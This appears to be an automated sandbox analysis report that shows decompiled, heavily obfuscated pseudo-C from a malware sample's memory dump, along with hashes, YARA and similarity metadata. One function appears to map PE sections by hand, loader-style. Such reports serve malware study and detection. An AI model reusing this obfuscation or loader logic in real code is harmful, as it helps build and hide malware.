                                                      • Opcode ID: 1082b0791201f3e6eafba73c062f4e466b6a6fabc7ac911334da811be6ba858e
                                                      • Instruction ID: aba586bf59d0b92451ed2e30d7337aa23cfed29c4a8f1305e84f95a4b7d844e7
                                                      • Opcode Fuzzy Hash: 1082b0791201f3e6eafba73c062f4e466b6a6fabc7ac911334da811be6ba858e
                                                      • Instruction Fuzzy Hash: CD0251B250D3818FE368CF25D54AA4BFBE1BBC4708F50891DF199862A0D7B59949CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023E377, Relevance: 15.3, Strings: 12, Instructions: 321COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E0023E377() {
				intOrPtr _t319;
				intOrPtr _t322;
				void* _t325;
				intOrPtr _t326;
				intOrPtr _t327;
				intOrPtr _t329;
				void* _t336;
				intOrPtr* _t368;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				void* _t374;
				intOrPtr* _t376;
				void* _t380;

				 *(_t380 + 0x90) = 0x492ac5;
				 *(_t380 + 0x94) = 0;
				 *((intOrPtr*)(_t380 + 0x98)) = 0;
				_t336 = 0x262df760;
				 *(_t380 + 0x48) = 0xf735;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) << 2;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) | 0x892d06ba;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x892fdeff;
				 *(_t380 + 4) = 0x4aa3;
				 *(_t380 + 4) =  *(_t380 + 4) >> 0xc;
				 *(_t380 + 4) =  *(_t380 + 4) | 0x950899f8;
				 *(_t380 + 4) =  *(_t380 + 4) << 4;
				 *(_t380 + 4) =  *(_t380 + 4) ^ 0x50899fc1;
				 *(_t380 + 0x34) = 0x5ec9;
				 *(_t380 + 0x8c) = 0;
				 *(_t380 + 0x44) =  *(_t380 + 0x34) * 0x1a;
				_t371 = 0x70;
				 *(_t380 + 0x48) =  *(_t380 + 0x44) * 0x3f;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x025e429c;
				 *(_t380 + 0x60) = 0xe88e;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) >> 5;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) + 0xffff58a0;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xffff02fa;
				 *(_t380 + 0x58) = 0xbd5e;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0xb084e46b;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) >> 0xe;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0x0002e87c;
				 *(_t380 + 0x2c) = 0x606e;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffff1c2d;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0x108d;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) * 0x15;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0xfff6a15c;
				 *(_t380 + 0x4c) = 0xb86a;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0xd5ca;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) | 0x7ce26820;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x7ce3b1fe;
				 *(_t380 + 0x44) = 0x5cf7;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) | 0x38977032;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) * 0x30;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) ^ 0x9c67384b;
				 *(_t380 + 0x74) = 0xd45b;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) / _t371;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x00004dc6;
				 *(_t380 + 0x14) = 0x87c2;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) + 0xc44a;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x3473056e;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x529657aa;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x66e43592;
				 *(_t380 + 0x6c) = 0x3ddc;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) >> 6;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0x00003a4d;
				 *(_t380 + 0x3c) = 0xc186;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) + 0xffff2874;
				_t372 = 0x60;
				 *(_t380 + 0x38) =  *(_t380 + 0x3c) / _t372;
				 *(_t380 + 0x38) =  *(_t380 + 0x38) ^ 0x02aacd93;
				 *(_t380 + 0x94) = 0x420b;
				 *(_t380 + 0x94) =  *(_t380 + 0x94) + 0xffff81cc;
				 *(_t380 + 0x94) =  *(_t380 + 0x94) ^ 0xffffbf2e;
				 *(_t380 + 0x24) = 0x5d05;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) << 7;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) >> 0xf;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53344f8a;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53345d77;
				 *(_t380 + 0x78) = 0xceba;
				 *(_t380 + 0x78) =  *(_t380 + 0x78) >> 0x10;
				 *(_t380 + 0x78) =  *(_t380 + 0x78) ^ 0x00002af4;
				 *(_t380 + 0x1c) = 0x6278;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) << 0xa;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x09bc8c53;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) + 0xd5e;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x08353d86;
				 *(_t380 + 0x18) = 0x457c;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x1123efff;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) + 0x9050;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x715c45c2;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x607832f2;
				 *(_t380 + 0x4c) = 0x48c4;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0x892d;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e86949;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e8d95b;
				 *(_t380 + 0x64) = 0xb936;
				 *(_t380 + 0x64) =  *(_t380 + 0x64) + 0xd883;
				 *(_t380 + 0x64) =  *(_t380 + 0x64) ^ 0x0001ac1b;
				 *(_t380 + 0x20) = 0xcbd2;
				_t373 = 0x7c;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) * 0x1d;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) / _t373;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) | 0xfc977955;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) ^ 0xfc977dd0;
				 *(_t380 + 0x6c) = 0x94d3;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) | 0xdadf67d0;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0xdadfc8fb;
				 *(_t380 + 0x90) = 0xca42;
				 *(_t380 + 0x90) =  *(_t380 + 0x90) * 0x44;
				 *(_t380 + 0x90) =  *(_t380 + 0x90) ^ 0x0035a538;
				 *(_t380 + 0x3c) = 0x3a85;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) | 0x6827828e;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) >> 5;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) ^ 0x0341637e;
				 *(_t380 + 0x74) = 0xaf39;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) << 0xb;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x0579f034;
				 *(_t380 + 0x84) = 0x7bfe;
				 *(_t380 + 0x84) =  *(_t380 + 0x84) * 0x70;
				 *(_t380 + 0x84) =  *(_t380 + 0x84) ^ 0x0036086b;
				 *(_t380 + 0x88) = 0xbca6;
				 *(_t380 + 0x88) =  *(_t380 + 0x88) + 0xffffd080;
				 *(_t380 + 0x88) =  *(_t380 + 0x88) ^ 0x0000ec3f;
				 *(_t380 + 0x7c) = 0x7bcd;
				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) >> 0xf;
				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) ^ 0x00003bde;
				 *(_t380 + 0x8c) = 0x5f89;
				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) + 0x6fee;
				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) ^ 0x0000a333;
				 *(_t380 + 0x2c) = 0x86b9;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffffbf3c;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 5;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 4;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0x000073b3;
				 *(_t380 + 0x50) = 0x2126;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x2e94f228;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) >> 0xe;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x00008d73;
				 *(_t380 + 0x80) = 0xf6ec;
				 *(_t380 + 0x80) =  *(_t380 + 0x80) * 0x34;
				 *(_t380 + 0x80) =  *(_t380 + 0x80) ^ 0x003277fb;
				 *(_t380 + 0x60) = 0x3ac6;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) * 0x28;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) | 0xd79c8d1c;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xd79df08f;
				 *(_t380 + 0x30) = 0x4848;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x9b476349;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x919ac53c;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x0adda027;
				 *(_t380 + 0x34) = 0xf09c;
				 *(_t380 + 0x34) =  *(_t380 + 0x34) << 0xc;
				_t374 = 0x28650a76;
				_t368 =  *((intOrPtr*)(_t380 + 0x98));
				_t334 =  *((intOrPtr*)(_t380 + 0x98));
				_t378 =  *((intOrPtr*)(_t380 + 0x98));
				 *(_t380 + 0x34) =  *(_t380 + 0x34) * 0x3e;
				 *(_t380 + 0x34) =  *(_t380 + 0x34) ^ 0xa45c8003;
				while(_t336 != 0xd3df7e1) {
					if(_t336 == 0x132cc48f) {
						E0023F536( *(_t380 + 0x34),  *(_t380 + 0x58),  *(_t380 + 0x84), _t368);
						_t336 = 0xd3df7e1;
						continue;
					}
					if(_t336 == 0x159b7bb7) {
						_push(_t336);
						_push(_t336);
						 *((intOrPtr*)(_t380 + 0xa0)) = 0x1000;
						_t368 = E00238736(0x1000);
						__eflags = _t368;
						_t336 =  !=  ? _t374 : 0xd3df7e1;
						continue;
					}
					if(_t336 == 0x18c2a499) {
						_t319 = E0023B566(_t336,  *(_t380 + 0x44) | 0x00000006,  *(_t380 + 0x74),  *((intOrPtr*)(_t380 + 0x68)), 1,  *(_t380 + 0x90), _t336,  *((intOrPtr*)(_t380 + 0x28)),  *(_t380 + 0x7c), 0x2000000,  *(_t380 + 0x44),  *((intOrPtr*)(_t380 + 0x9c)),  *(_t380 + 0x38), _t380 + 0xb0);
						_t334 = _t319;
						_t380 = _t380 + 0x30;
						__eflags = _t319 - 0xffffffff;
						if(__eflags == 0) {
							L29:
							__eflags = 0;
							return 0;
						}
						_t336 = 0x159b7bb7;
						continue;
					}
					if(_t336 == 0x1a0fbde3) {
						E00243E3F(_t336, _t380 + 0xb4, __eflags,  *(_t380 + 0x48),  *((intOrPtr*)(_t380 + 0x5c)));
						_t322 = E002328CE(_t380 + 0xbc,  *(_t380 + 0x60),  *(_t380 + 0x30));
						_t378 = _t322;
						_t380 = _t380 + 0xc;
						_t336 = 0x18c2a499;
						 *((short*)(_t322 - 2)) = 0;
						continue;
					}
					if(_t336 == 0x262df760) {
						_t336 = 0x1a0fbde3;
						continue;
					}
					if(_t336 != _t374) {
						L28:
						__eflags = _t336 - 0x1c26cb40;
						if(__eflags != 0) {
							continue;
						}
						goto L29;
					}
					_t325 = E00246319( *(_t380 + 0x44), _t334,  *((intOrPtr*)(_t380 + 0xc4)),  *(_t380 + 0x74),  *(_t380 + 0x7c),  *(_t380 + 0x84), _t368,  *(_t380 + 0x38), _t336,  *(_t380 + 0x7c), _t336, _t336,  *(_t380 + 0x94), _t380 + 0xac);
					_t380 = _t380 + 0x30;
					if(_t325 == 0) {
						_t326 =  *((intOrPtr*)(_t380 + 0x9c));
						L18:
						__eflags = _t326;
						if(__eflags == 0) {
							_t336 = _t374;
						} else {
							_t327 =  *0x24ca30; // 0x0
							E00248A4B( *(_t380 + 0x90),  *(_t380 + 0x94),  *(_t380 + 0x84),  *((intOrPtr*)(_t327 + 8)),  *(_t380 + 0x8c));
							_t380 = _t380 + 0xc;
							_t336 = 0x132cc48f;
						}
						continue;
					}
					_t376 = _t368;
					while( *((intOrPtr*)(_t376 + 4)) != 4 || E00238624( *(_t380 + 0x44), _t378,  *(_t380 + 0x78), _t376 + 0xc) != 0) {
						_t329 =  *_t376;
						if(_t329 == 0) {
							_t326 =  *((intOrPtr*)(_t380 + 0x9c));
							L17:
							_t374 = 0x28650a76;
							goto L18;
						}
						_t376 = _t376 + _t329;
					}
					_t326 = 1;
					 *((intOrPtr*)(_t380 + 0x9c)) = 1;
					goto L17;
				}
				E00244F7D( *(_t380 + 0x60),  *(_t380 + 0x30), _t334);
				_t336 = 0x1c26cb40;
				goto L28;
			}

















                                                      0x0023e37d
                                                      0x0023e38a
                                                      0x0023e393
                                                      0x0023e39a
                                                      0x0023e39f
                                                      0x0023e3a7
                                                      0x0023e3ac
                                                      0x0023e3b4
                                                      0x0023e3bc
                                                      0x0023e3c4
                                                      0x0023e3c9
                                                      0x0023e3d1
                                                      0x0023e3d6
                                                      0x0023e3de
                                                      0x0023e3e6
                                                      0x0023e3f6
                                                      0x0023e401
                                                      0x0023e404
                                                      0x0023e408
                                                      0x0023e410
                                                      0x0023e418
                                                      0x0023e41d
                                                      0x0023e425
                                                      0x0023e42d
                                                      0x0023e435
                                                      0x0023e43d
                                                      0x0023e442
                                                      0x0023e44a
                                                      0x0023e452
                                                      0x0023e45a
                                                      0x0023e467
                                                      0x0023e46b
                                                      0x0023e473
                                                      0x0023e47b
                                                      0x0023e483
                                                      0x0023e48b
                                                      0x0023e493
                                                      0x0023e49b
                                                      0x0023e4a8
                                                      0x0023e4ac
                                                      0x0023e4b4
                                                      0x0023e4c4
                                                      0x0023e4c8
                                                      0x0023e4d0
                                                      0x0023e4d8
                                                      0x0023e4e0
                                                      0x0023e4e8
                                                      0x0023e4f0
                                                      0x0023e4f8
                                                      0x0023e500
                                                      0x0023e505
                                                      0x0023e50d
                                                      0x0023e515
                                                      0x0023e521
                                                      0x0023e524
                                                      0x0023e528
                                                      0x0023e530
                                                      0x0023e53b
                                                      0x0023e546
                                                      0x0023e551
                                                      0x0023e559
                                                      0x0023e55e
                                                      0x0023e563
                                                      0x0023e56b
                                                      0x0023e573
                                                      0x0023e57d
                                                      0x0023e582
                                                      0x0023e58a
                                                      0x0023e592
                                                      0x0023e597
                                                      0x0023e59f
                                                      0x0023e5a7
                                                      0x0023e5af
                                                      0x0023e5b7
                                                      0x0023e5bf
                                                      0x0023e5c7
                                                      0x0023e5cf
                                                      0x0023e5d7
                                                      0x0023e5df
                                                      0x0023e5e7
                                                      0x0023e5ef
                                                      0x0023e5f7
                                                      0x0023e5ff
                                                      0x0023e607
                                                      0x0023e60f
                                                      0x0023e61e
                                                      0x0023e61f
                                                      0x0023e629
                                                      0x0023e62d
                                                      0x0023e635
                                                      0x0023e63d
                                                      0x0023e645
                                                      0x0023e64d
                                                      0x0023e655
                                                      0x0023e668
                                                      0x0023e66f
                                                      0x0023e67a
                                                      0x0023e682
                                                      0x0023e68a
                                                      0x0023e68f
                                                      0x0023e697
                                                      0x0023e69f
                                                      0x0023e6a4
                                                      0x0023e6ac
                                                      0x0023e6bf
                                                      0x0023e6c6
                                                      0x0023e6d1
                                                      0x0023e6dc
                                                      0x0023e6e7
                                                      0x0023e6f2
                                                      0x0023e6fa
                                                      0x0023e6ff
                                                      0x0023e707
                                                      0x0023e712
                                                      0x0023e71d
                                                      0x0023e728
                                                      0x0023e730
                                                      0x0023e738
                                                      0x0023e73d
                                                      0x0023e742
                                                      0x0023e74a
                                                      0x0023e752
                                                      0x0023e75a
                                                      0x0023e75f
                                                      0x0023e767
                                                      0x0023e77a
                                                      0x0023e781
                                                      0x0023e78c
                                                      0x0023e799
                                                      0x0023e79d
                                                      0x0023e7a5
                                                      0x0023e7ad
                                                      0x0023e7b5
                                                      0x0023e7bd
                                                      0x0023e7c5
                                                      0x0023e7cd
                                                      0x0023e7d5
                                                      0x0023e7da
                                                      0x0023e7e4
                                                      0x0023e7eb
                                                      0x0023e7f2
                                                      0x0023e7f9
                                                      0x0023e7fd
                                                      0x0023e805
                                                      0x0023e817
                                                      0x0023ea0c
                                                      0x0023ea13
                                                      0x00000000
                                                      0x0023ea13
                                                      0x0023e823
                                                      0x0023e9d2
                                                      0x0023e9d3
                                                      0x0023e9d9
                                                      0x0023e9ea
                                                      0x0023e9ed
                                                      0x0023e9f4
                                                      0x00000000
                                                      0x0023e9f4
                                                      0x0023e82f
                                                      0x0023e9a9
                                                      0x0023e9ae
                                                      0x0023e9b0
                                                      0x0023e9b3
                                                      0x0023e9b6
                                                      0x0023ea3d
                                                      0x0023ea40
                                                      0x0023ea49
                                                      0x0023ea49
                                                      0x0023e9bc
                                                      0x00000000
                                                      0x0023e9bc
                                                      0x0023e83b
                                                      0x0023e93e
                                                      0x0023e952
                                                      0x0023e957
                                                      0x0023e959
                                                      0x0023e95e
                                                      0x0023e963
                                                      0x00000000
                                                      0x0023e963
                                                      0x0023e847
                                                      0x0023e925
                                                      0x00000000
                                                      0x0023e925
                                                      0x0023e84f
                                                      0x0023ea31
                                                      0x0023ea31
                                                      0x0023ea37
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0023ea37
                                                      0x0023e88c
                                                      0x0023e891
                                                      0x0023e896
                                                      0x0023e8cf
                                                      0x0023e8e4
                                                      0x0023e8e4
                                                      0x0023e8e6
                                                      0x0023e91e
                                                      0x0023e8e8
                                                      0x0023e8ef
                                                      0x0023e90c
                                                      0x0023e911
                                                      0x0023e914
                                                      0x0023e914
                                                      0x00000000
                                                      0x0023e8e6
                                                      0x0023e898
                                                      0x0023e89a
                                                      0x0023e8b9
                                                      0x0023e8bd
                                                      0x0023e8d8
                                                      0x0023e8df
                                                      0x0023e8df
                                                      0x00000000
                                                      0x0023e8df
                                                      0x0023e8bf
                                                      0x0023e8bf
                                                      0x0023e8c5
                                                      0x0023e8c6
                                                      0x00000000
                                                      0x0023e8c6
                                                      0x0023ea26
                                                      0x0023ea2c
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: h|$&!$?$HH$M:$^$n`$ve($ve($w]4S$|E$o
                                                      • API String ID: 823142352-1348462970
                                                      • Opcode ID: f09502523fef88919c0c1632ccc10a26b21da76b79abd427d4cf3bcea4caab25
                                                      • Instruction ID: 6f425dee6e127b4917b8fc6cbd7d33fe8a1ccfb45088ea1c7c2e752b8fe815bf
                                                      • Opcode Fuzzy Hash: f09502523fef88919c0c1632ccc10a26b21da76b79abd427d4cf3bcea4caab25
                                                      • Instruction Fuzzy Hash: 02F131B15193819FE768CF25C54AA5BBBF1BBC4708F108A1DF1DA862A0D7B58919CF03
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00246DB9, Relevance: 15.2, Strings: 12, Instructions: 224COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E00246DB9(void* __ecx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t224;
				void* _t243;
				void* _t256;
				void* _t264;
				void* _t288;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				void* _t295;
				void* _t298;
				signed int* _t301;
				signed int* _t302;
				signed int* _t303;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(3);
				_push(__ecx);
				E0023602B(_t224);
				_v4 = _v4 & 0x00000000;
				_v8 = 0x15bbba;
				_v72 = 0x7e44;
				_t290 = 0x3e;
				_v72 = _v72 * 0x56;
				_v72 = _v72 | 0xe97810d5;
				_v72 = _v72 ^ 0xe97a6add;
				_v56 = 0x50ea;
				_v56 = _v56 >> 9;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x00008000;
				_v100 = 0x7422;
				_v100 = _v100 + 0xffff8791;
				_v100 = _v100 ^ 0x724a15f0;
				_v100 = _v100 + 0xd05;
				_v100 = _v100 ^ 0x8db5db48;
				_v48 = 0x2edd;
				_v48 = _v48 / _t290;
				_v48 = _v48 ^ 0x00005532;
				_v76 = 0xee3f;
				_v76 = _v76 + 0xffffe6cd;
				_v76 = _v76 + 0xffff5ce1;
				_v76 = _v76 ^ 0x00006965;
				_v104 = 0xa36d;
				_v104 = _v104 << 0xc;
				_v104 = _v104 + 0x5d19;
				_v104 = _v104 >> 1;
				_v104 = _v104 ^ 0x051bebf0;
				_v52 = 0xa852;
				_v52 = _v52 + 0xddb7;
				_v52 = _v52 ^ 0x00019bba;
				_v96 = 0xa4e6;
				_v96 = _v96 | 0xa6d42a45;
				_t291 = 0x2e;
				_v96 = _v96 * 0x22;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x507e3c16;
				_v40 = 0x2ce2;
				_v40 = _v40 + 0xffffe435;
				_v40 = _v40 ^ 0x00002c9b;
				_v64 = 0xad5e;
				_v64 = _v64 * 0xd;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 ^ 0x00006dfc;
				_v68 = 0x15e2;
				_v68 = _v68 << 4;
				_v68 = _v68 + 0x971e;
				_v68 = _v68 ^ 0x0001ffd3;
				_v28 = 0x5912;
				_v28 = _v28 | 0xb77a8e9e;
				_v28 = _v28 ^ 0xb77a927a;
				_v32 = 0xb0a1;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x000014c1;
				_v36 = 0x1527;
				_v36 = _v36 / _t291;
				_v36 = _v36 ^ 0x000058cb;
				_v92 = 0x32e5;
				_v92 = _v92 * 0x31;
				_v92 = _v92 + 0xffff00ec;
				_v92 = _v92 << 8;
				_v92 = _v92 ^ 0x08be8a0d;
				_v20 = 0xbd6f;
				_v20 = _v20 + 0xab45;
				_v20 = _v20 ^ 0x000148c7;
				_v24 = 0x6d6f;
				_t292 = 0x6d;
				_v24 = _v24 / _t292;
				_v24 = _v24 ^ 0x00002132;
				_v84 = 0xac46;
				_t293 = 0x2f;
				_v84 = _v84 * 0x6c;
				_v84 = _v84 + 0xe89f;
				_v84 = _v84 >> 7;
				_v84 = _v84 ^ 0x0000aacf;
				_v88 = 0x7aeb;
				_v88 = _v88 * 0x1d;
				_v88 = _v88 >> 0xb;
				_t294 = 0x7f;
				_v88 = _v88 / _t293;
				_v88 = _v88 ^ 0x00001cd5;
				_v60 = 0x8b82;
				_v60 = _v60 + 0xffffb5bd;
				_v60 = _v60 * 0x35;
				_v60 = _v60 ^ 0x000df53e;
				_v12 = 0x733f;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x000065d0;
				_v16 = 0x6f84;
				_v16 = _v16 | 0x29e4272c;
				_v16 = _v16 ^ 0x29e452e1;
				_v80 = 0x4249;
				_v80 = _v80 >> 0xb;
				_v80 = _v80 / _t294;
				_v80 = _v80 >> 3;
				_v80 = _v80 ^ 0x00004a04;
				_v44 = 0x4ba5;
				_v44 = _v44 + 0xffffabaf;
				_v44 = _v44 ^ 0xfffff714;
				_t243 = E00243811(__ecx, _v48, _a8, _v76, _v104, _v52);
				_t256 = _t243;
				_t301 =  &(( &_v104)[0xb]);
				if(_t256 == 0) {
					return _t243;
				}
				_t295 = E00237EC5(_v96, _v40,  *((intOrPtr*)(_t256 + 0x50)), _v64, _v68, _v44, __ecx, _v100 | _v72);
				_t302 =  &(_t301[6]);
				if(_t295 == 0) {
					L7:
					return _t295;
				}
				E00242674(_v28, _v32,  *((intOrPtr*)(_t256 + 0x54)), _t295, _v36, _v92, _a8);
				_t303 =  &(_t302[5]);
				_t288 = ( *(_t256 + 0x14) & 0x0000ffff) + 0x18 + _t256;
				_t298 = ( *(_t256 + 6) & 0x0000ffff) * 0x28 + _t288;
				while(_t288 < _t298) {
					_t261 =  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10));
					E00242674(_v20, _v24,  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10)),  *((intOrPtr*)(_t288 + 0xc)) + _t295, _v84, _v88,  *((intOrPtr*)(_t288 + 0x14)) + _a8);
					_t303 =  &(_t303[5]);
					_t288 = _t288 + 0x28;
				}
				E0023F7D8(_t295, _t256);
				_t264 = _t295;
				if(E0023E05A(_t264, _t256) == 0) {
					_push(_t264);
					E00244FE8(_v56, _t295, _v60, _v12, _v16, _v80);
					_t295 = 0;
				}
				goto L7;
			}












































                                                      0x00246dbe
                                                      0x00246dc5
                                                      0x00246dcc
                                                      0x00246dd3
                                                      0x00246dda
                                                      0x00246ddc
                                                      0x00246dde
                                                      0x00246ddf
                                                      0x00246de4
                                                      0x00246dee
                                                      0x00246df9
                                                      0x00246e08
                                                      0x00246e0b
                                                      0x00246e0f
                                                      0x00246e17
                                                      0x00246e1f
                                                      0x00246e27
                                                      0x00246e2c
                                                      0x00246e31
                                                      0x00246e39
                                                      0x00246e41
                                                      0x00246e49
                                                      0x00246e51
                                                      0x00246e59
                                                      0x00246e61
                                                      0x00246e71
                                                      0x00246e75
                                                      0x00246e7d
                                                      0x00246e85
                                                      0x00246e8d
                                                      0x00246e95
                                                      0x00246e9d
                                                      0x00246ea5
                                                      0x00246eaa
                                                      0x00246eb2
                                                      0x00246eb6
                                                      0x00246ebe
                                                      0x00246ec6
                                                      0x00246ece
                                                      0x00246ed6
                                                      0x00246ede
                                                      0x00246eeb
                                                      0x00246eec
                                                      0x00246ef0
                                                      0x00246ef4
                                                      0x00246efc
                                                      0x00246f04
                                                      0x00246f0c
                                                      0x00246f14
                                                      0x00246f21
                                                      0x00246f25
                                                      0x00246f2a
                                                      0x00246f32
                                                      0x00246f3a
                                                      0x00246f3f
                                                      0x00246f47
                                                      0x00246f4f
                                                      0x00246f57
                                                      0x00246f5f
                                                      0x00246f67
                                                      0x00246f6f
                                                      0x00246f74
                                                      0x00246f7c
                                                      0x00246f8a
                                                      0x00246f8e
                                                      0x00246f96
                                                      0x00246fa3
                                                      0x00246fa7
                                                      0x00246fb1
                                                      0x00246fb6
                                                      0x00246fbe
                                                      0x00246fc6
                                                      0x00246fce
                                                      0x00246fd6
                                                      0x00246fe4
                                                      0x00246fe9
                                                      0x00246fef
                                                      0x00246ff7
                                                      0x00247004
                                                      0x00247007
                                                      0x0024700b
                                                      0x00247013
                                                      0x00247018
                                                      0x00247020
                                                      0x0024702d
                                                      0x00247031
                                                      0x0024703c
                                                      0x0024703d
                                                      0x00247043
                                                      0x0024704b
                                                      0x00247053
                                                      0x00247060
                                                      0x00247064
                                                      0x0024706c
                                                      0x00247077
                                                      0x0024707f
                                                      0x0024708a
                                                      0x00247092
                                                      0x0024709a
                                                      0x002470a2
                                                      0x002470aa
                                                      0x002470b5
                                                      0x002470b9
                                                      0x002470be
                                                      0x002470c6
                                                      0x002470ce
                                                      0x002470d6
                                                      0x002470f5
                                                      0x002470fa
                                                      0x002470fc
                                                      0x00247101
                                                      0x002471ee
                                                      0x002471ee
                                                      0x0024712d
                                                      0x0024712f
                                                      0x00247134
                                                      0x002471e7
                                                      0x00000000
                                                      0x002471e7
                                                      0x00247157
                                                      0x00247160
                                                      0x0024716d
                                                      0x0024716f
                                                      0x002471aa
                                                      0x0024718d
                                                      0x0024719f
                                                      0x002471a4
                                                      0x002471a7
                                                      0x002471a7
                                                      0x002471b2
                                                      0x002471b9
                                                      0x002471c4
                                                      0x002471c6
                                                      0x002471dd
                                                      0x002471e5
                                                      0x002471e5
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
